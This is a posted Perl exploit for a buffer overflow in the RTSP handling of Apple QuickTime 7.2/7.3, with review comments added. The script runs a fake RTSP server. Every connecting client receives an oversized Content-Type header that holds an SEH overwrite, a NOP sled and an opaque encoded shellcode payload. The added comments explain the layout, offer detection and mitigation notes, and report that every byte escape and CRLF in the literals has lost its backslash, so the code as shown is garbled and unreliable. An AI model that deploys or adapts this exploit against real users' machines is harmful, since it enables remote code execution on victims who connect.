# Title : Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
# Published : 2010-01-06
# Author : Jacky
# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
# Date: 2009-01-06
# Author: Jacky
# Software Link: [download link if available]
# Version: 7.2/7.3
# Tested on: Windows XP SP3
# CVE : [if exists]
# Code :
#Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition )
#Discovered by (Krystian Kloskowski (h07) <h07@interia.pl>)
#Written and coded by Jacky!
#All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-)
#This time I wrote the exploit in Perl, because I saw that it had been written
#many times in Python and Ruby only!
#This exploit is for EDUCATIONAL PURPOSES ONLY !!!
#!/usr/bin/perl -w
# NOTE(review): this shebang is not the first line of the posted file (the
# comment header above precedes it), so perl will not pick up the -w switch
# from it; there is no "use warnings" either, only "use strict" below.
#
# What this script is: a fake RTSP *server*. It listens on TCP port $port
# (default 554), never reads the client's request, and answers every
# connection with one canned "RTSP/1.0 200 OK" response whose Content-Type
# header is the oversized buffer described below. The vulnerable component is
# therefore the client (QuickTime 7.2/7.3 per the header) that connects to it.
#
# Layout of the oversized Content-Type value, from the original finding:
#   (RTSP) Content-Type: [A * 995] + [B * 4096] followed by CRLF
#
# 0x41414141 Pointer to next SEH record   (last 4 bytes of the 995-byte A run)
# 0x42424242 SE handler                   (first 4 bytes of the B run)
#
# NOTE(review): every "\x.." byte escape and every "\r\n" in the string
# literals below is missing its backslash, presumably lost during extraction.
# As posted, "x41" is three literal characters and "rn" is two letters, so
# the script does not produce the byte layout above, and its request lines
# are not CRLF-terminated.
#
# Defender notes: the response is pushed without waiting for a request, and a
# Content-Type header several kilobytes long is not something a legitimate
# RTSP server emits; both are simple detection points for RTSP traffic toward
# clients. Mitigation is keeping clients off the affected versions and not
# pointing them at untrusted rtsp:// URLs.
use strict;
use Socket;
# Filler up to the SEH record: 991 bytes + the 4-byte $nseh = the 995 "A"s
# in the layout above.
my $junk="A"x991;
# Written over the "next SEH record" pointer (the 0x41414141 slot).
my $nseh="xebx06x90x90";
# Written over the SE handler slot (0x42424242). Which module or address this
# refers to is not stated on the page.
my $seh="x4ex28x86x66"; #x4ex28x86x66
my $nops="x90"x20;
# Payload bytes. The page does not say what they do; treat them as opaque
# and hostile.
my $shellcode="x89xe2xddxc4xd9x72xf4x58x50x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx48x68x4fx79x43x30x43x30" .
"x47x70x45x30x4bx39x4dx35x50x31x49x42x45x34" .
"x4ex6bx46x32x44x70x4cx4bx50x52x44x4cx4cx4b" .
"x42x72x45x44x4cx4bx50x72x51x38x44x4fx4fx47" .
"x50x4ax47x56x46x51x49x6fx45x61x4bx70x4cx6c" .
"x45x6cx43x51x51x6cx47x72x46x4cx47x50x4fx31" .
"x4ax6fx44x4dx46x61x49x57x4ax42x48x70x46x32" .
"x46x37x4ex6bx50x52x46x70x4cx4bx47x32x47x4c" .
"x45x51x4ex30x4ex6bx51x50x44x38x4bx35x4bx70" .
"x43x44x43x7ax46x61x4ex30x46x30x4ex6bx50x48" .
"x46x78x4cx4bx51x48x47x50x46x61x49x43x4bx53" .
"x47x4cx50x49x4cx4bx46x54x4cx4bx46x61x48x56" .
"x50x31x49x6fx50x31x49x50x4ex4cx4fx31x48x4f" .
"x44x4dx47x71x48x47x46x58x4bx50x44x35x49x64" .
"x44x43x51x6dx4ax58x47x4bx43x4dx44x64x50x75" .
"x4ax42x50x58x4ex6bx42x78x47x54x46x61x4bx63" .
"x43x56x4ex6bx44x4cx42x6bx4cx4bx42x78x45x4c" .
"x45x51x49x43x4ex6bx44x44x4cx4bx47x71x4ex30" .
"x4cx49x43x74x44x64x44x64x43x6bx51x4bx51x71" .
"x43x69x43x6ax43x61x4bx4fx49x70x42x78x43x6f" .
"x42x7ax4ex6bx45x42x4ax4bx4fx76x51x4dx51x7a" .
"x45x51x4ex6dx4bx35x4dx69x43x30x47x70x47x70" .
"x50x50x45x38x45x61x4cx4bx42x4fx4ex67x4bx4f" .
"x49x45x4dx6bx49x6ex44x4ex44x72x4bx5ax45x38" .
"x4fx56x4fx65x4dx6dx4fx6dx49x6fx4ax75x45x6c" .
"x47x76x43x4cx46x6ax4dx50x49x6bx49x70x44x35" .
"x44x45x4fx4bx51x57x47x63x50x72x50x6fx42x4a" .
"x43x30x46x33x4bx4fx48x55x45x33x51x71x42x4c" .
"x42x43x44x6ex42x45x44x38x43x55x45x50x41x41";
# Pads $seh.$nops.$shellcode out to exactly 4096 bytes (the "B * 4096" run),
# so the header value is always 991 + 4 + 4096 bytes long.
my $rest="B"x(4096-length($seh.$nops.$shellcode));
my $payload=$junk.$nseh.$seh.$nops.$shellcode.$rest;
# Canned RTSP response; $payload is embedded as the Content-Type value.
# Content-Length is hard-coded to 334 rather than computed from $body.
my $header = "RTSP/1.0 200 OKrn".
"CSeq: 1rn".
"Date: 0x00 :Prn".
"Content-Base: rtsp://0.0.0.0/1.mp3/rn".
"Content-Type: $payloadrn".
"Content-Length: 334rn".
"rn";
# SDP body. The layout comment places the overflow in the Content-Type
# header, so this body looks like cosmetic filler; the page does not say
# whether any of it is required by the client.
my $body = "v=0rn".
"o=- 16689332712 1 IN IP4 0.0.0.0rn".
"s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.Orn".
"i=1.mp3rn".
"t=0 0rn".
"a=tool:ciamciaramciarn".
"a=type:broadcastrn".
"a=control:*rn".
"a=range:npt=0-213.077rn".
"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.Orn".
"a=x-qt-text-inf:1.mp3rn".
"m=audio 0 RTP/AVP 14rn".
"c=IN IP4 0.0.0.0rn".
"a=control:track1rn";
my $evil=$header.$body;
# Listening port: first command-line argument, else 554.
my $port=shift || 554;
my $proto=getprotobyname('tcp');
# NOTE(review): socket/bind/listen return values are never checked, and
# SERVER/CLIENT are bareword (global) handles. If bind fails (port already
# in use, or an unprivileged user on a port below 1024 on Unix) nothing is
# reported; accept() then fails and the loop below ends at once.
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);   # binds on every interface
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
# The message hard-codes 554 even when $port was overridden above; the
# trailing "n" is a garbled "\n", as in the other literals.
print "[+]Listening on [RTSP]554n";
my $client_addr;
# One canned response per accepted connection. The client's request is never
# read, and the CLIENT handle is only closed explicitly after the loop ends.
while($client_addr=accept(CLIENT,SERVER))
{
print CLIENT $evil;
print "[+]Connection Acceptedn";
print "[+]Sending Evil Payloadn";
}
# Reached only once accept() fails; closes the last client handle.
close CLIENT;
print "[+]Connection closedn";